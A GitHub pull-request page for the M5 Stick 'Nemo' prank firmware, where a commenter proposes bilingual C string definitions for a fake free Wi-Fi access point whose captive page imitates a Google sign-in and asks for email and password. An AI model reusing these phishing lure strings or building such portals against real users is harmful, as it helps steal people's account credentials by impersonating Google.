n0xa / m5stick-nemo

M5 Stick C firmware for high-tech pranks
Other
731 stars 148 forks source link

Update portal.h #45

Closed gobemanuel closed 2 weeks ago

Mmatuda commented 7 months ago

Boa! Estou compilando um código com as melhorias do pessoal... peguei sua ideia e deixei assim, o que acha?

#if defined(LANGUAGE_EN_US)
#define DEFAULT_AP_SSID_NAME "Nemo Free WiFi"
#define LOGIN_TITLE "Sign in"
#define LOGIN_SUBTITLE "Sign In With Google"
#define LOGIN_EMAIL_PLACEHOLDER "Email"
#define LOGIN_PASSWORD_PLACEHOLDER "Password"
#define LOGIN_MESSAGE "Please log in to browse securely."
#define LOGIN_BUTTON "Next"
#define LOGIN_AFTER_MESSAGE "Please wait a few minutes. Soon you will be able to access the internet."
#elif defined(LANGUAGE_PT_BR)
#define DEFAULT_AP_SSID_NAME "WiFi Gratis"
#define LOGIN_TITLE "Fazer login"
#define LOGIN_SUBTITLE "Use sua Conta do Google"